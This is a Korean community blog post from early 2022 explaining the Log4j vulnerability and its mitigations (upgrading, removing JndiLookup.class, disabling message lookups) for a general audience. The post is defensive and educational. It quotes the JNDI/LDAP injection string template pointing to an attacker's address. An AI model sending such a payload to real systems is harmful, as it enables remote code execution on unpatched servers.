회사생활🎁

[Tech] 사상최악의 보안 취약점, Log4j 취약점

22년 02월 04일 | 조회수 554
avatar
김정희
LINE Plus Corp.

안녕하세요. 오늘은 본연의 업무로 돌아와서, 보안과 관련된 글을 써보도록 하겠습니다. 2021년의 마지막을 떠들썩하게 장식하였던 Log4j 취약점에 대해 좀더 쉽게 알려드리고자 합니다. 우선, Log4j는 아파치 소프트웨어 재단이 개발한 'JAVA'기반의 오픈소스 프로그램으로 동작 도중 '로그'를 기록하는 목적으로 사용됩니다. JAVA와 관련된 로그를 쉽고 편리하게 관리하기 위한 프로그램이라고 생각하시면 되겠습니다. 많은 기업들이 JAVA로 개발된 홈페이지와 같은 인터넷 서비스를 운영, 관리하면서 기록을 남기기위해 사용하고 있습니다. ※ 'JAVA' : 썬 마이크로시스템즈연구원들에 의해 처음 개발된 인터넷 환경에서 가장 활발히 사용되는 프로그래밍 언어. '로그' : 시스템, 서비스 등의 동작 상태를 남긴 기록. Log4j 취약점은 중국 Alibaba Cloud 보안팀에 의해서 21년 11월 경 Apache에 공식 보고가 되었으며, 대표적으로는 유명세를 갖고 있는 온라인 게임 마인크래프트에서 프로그래밍 코드로 이뤄진 '특정 채팅 메시지'를 입력하면 원격으로 프로그램을 실행할 수 있는 문제점이 실제 확인되었습니다. Log4j 취약점을 이용한 공격은 쉬운 반면 결과는 치명적이기 때문에 Log4j를 사용하는 많은 기업들이 피해를 입을 수 있어서 고위험 등급의 취약점으로 분류되었습니다. ※ '특정 채팅 메시지' : ${jndi:ldap://공격자의 주소} 외부에서의 메시지 입력만으로도 내 시스템의 권한을 빼앗길 수 있고, 타인이 인증없이 손쉽게 내 시스템에 침투할 수 있는 취약점이다보니 공개된 이후 발빠르게 조치하기위해서 정보보안분야의 많은 전문가 분들께서 불철주야 고생이 많으셨으리라 짐작됩니다. Log4j 중에서도 2.0 버전부터 취약점이 발견되어 완벽한 조치를 위해서는 해당 프로그램을 아예 삭제하여 쓰지않는 것이 제일 좋지만 이미 폭넓게 사용중이다보니 서비스를 유지하기 위해서 취약점이 조치된 최신버전으로 업그레이드를 하는 방법이 권장되었습니다. 이밖에도 'JndiLookup 클래스를 경로에서 제거'하거나 '환경변수 설정변경'하는 방법으로 긴급조치가 진행되었습니다. ※ 'JndiLookup 클래스를 경로에서 제거' : zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class '환경변수 설정변경' : Log4j2.formatMsgNoLookups 또는 LOG4J_FORMAT_MSG_NO_LOOKUPS 환경변수 true 설정 발빠른 정보보안분야의 전문가 분들의 노고로 “최근 10년간 가장 치명적이고 거대한 취약점이다. 현대 컴퓨터 역사를 통틀어 최악의 보안 결함일 수도 있다”라는 이야기가 있던 Log4j 취약점에 대해 많은 분들께서 알아차리시기도 전에 신속하게 조치가 되었지만, 이와 유사한 취약점은 지금도 끊임없이 등장하고 이를 이용한 공격은 지속적으로 계속될 것이기 때문에 간단하게나마 알아두시고 경각심을 가지시길 바라는 마음으로 Log4j 취약점에 대한 글을 쓰게 되었습니다. 근처에서 고생하고 계시는 보안담당자분들이 계시다면 가볍게 격려의 한마디라도 부탁드립니다. 감사합니다. [취약점] o Apache Log4j 2에서 발생하는 원격코드 실행 취약점(CVE-2021-44228) - 취약점이 조치된 최신버전 사용권고 o Apache Log4j 2에서 발생하는 서비스 거부 취약점(CVE-2021-45046) - 취약점이 조치된 최신버전 사용권고 o Apache Log4j 1.2에서 발생하는 원격코드 실행 취약점(CVE-2021-4104) - Apache Log4j 1.2는 2015년 8월에 종료 - 취약점이 조치된 최신버전 사용권고 - JMSAppender 미사용 권고 [참고사이트] [1] apache 보안업데이트 현황 :

[2] 취약점 정보 : [3] 신규버전 다운로드 : [4] 제조사별 현황 : [5] 탐지정책 : [6] 취약점 대응 가이드 : [7] 취약점 정보 : [8] 취약점 정보 : [9] Log4j 2.12.2버전 다운로드 :

첨부 이미지첨부 이미지
댓글 2
공감순
최신순
    플랜비
    22년 02월 04일
    좋은 분석 감사합니다.. 아파치 사용 여러 스타트업 혹은 개발자분들께 의미있는 글이네요 고생 많으셨습니다.
    좋은 분석 감사합니다.. 아파치 사용 여러 스타트업 혹은 개발자분들께 의미있는 글이네요 고생 많으셨습니다.
    답글 쓰기
    3
    avatar
    김정희
    작성자
    LINE Plus Corp.
    22년 02월 04일
    조치 중이신 곳이 있으시면 참고하시어 취약점을 줄여가시면 좋겠습니다. :) 읽어주셔서 감사합니다.
    조치 중이신 곳이 있으시면 참고하시어 취약점을 줄여가시면 좋겠습니다. :) 읽어주셔서 감사합니다.
    1
    지금 바로 리멤버 회원이 되어
    모든 댓글을 확인하세요
    리멤버
    @멘션된 회사에서 재직했었음
    19년 05월 28일
    회사에서 풀지 못한 고민, 여기서 회사에서 업무를 하다가 풀지 못한 실무적인 어려움, 사업적인 도움이 필요한 적이 있으셨나요? <리멤버 커뮤니티>는 회원님과 같은 일을 하는 사람들과 이러한 고민을 해결할 수 있는 온라인 공간입니다. 회원 가입 하고 보다 쉽게 같은 일 하는 사람들과 소통하세요
    회사에서 풀지 못한 고민, 여기서 회사에서 업무를 하다가 풀지 못한 실무적인 어려움, 사업적인 도움이 필요한 적이 있으셨나요? <리멤버 커뮤니티>는 회원님과 같은 일을 하는 사람들과 이러한 고민을 해결할 수 있는 온라인 공간입니다. 회원 가입 하고 보다 쉽게 같은 일 하는 사람들과 소통하세요
    답글 쓰기
    0
    리멤버
    @멘션된 회사에서 재직했었음
    19년 05월 28일
    일하는 사람과 기회를 연결하여 성공으로 이끈다
    일하는 사람과 기회를 연결하여 성공으로 이끈다
    답글 쓰기
    0
추천글
대표전화 : 02-556-4202
06235 서울시 강남구 테헤란로 134, 5,6,9층
(역삼동, 포스코타워 역삼) (대표자:최재호, 송기홍)
사업자등록번호 : 211-88-81111
통신판매업 신고번호: 2016-서울강남-03104호
| 직업정보제공사업 신고번호: 서울강남 제2019-11호
| 유료직업소개사업 신고번호: 2020-3220237-14-5-00003
| 국외 유료직업소개사업 신고번호: F1200020240004
Copyright Remember & Company All rights reserved.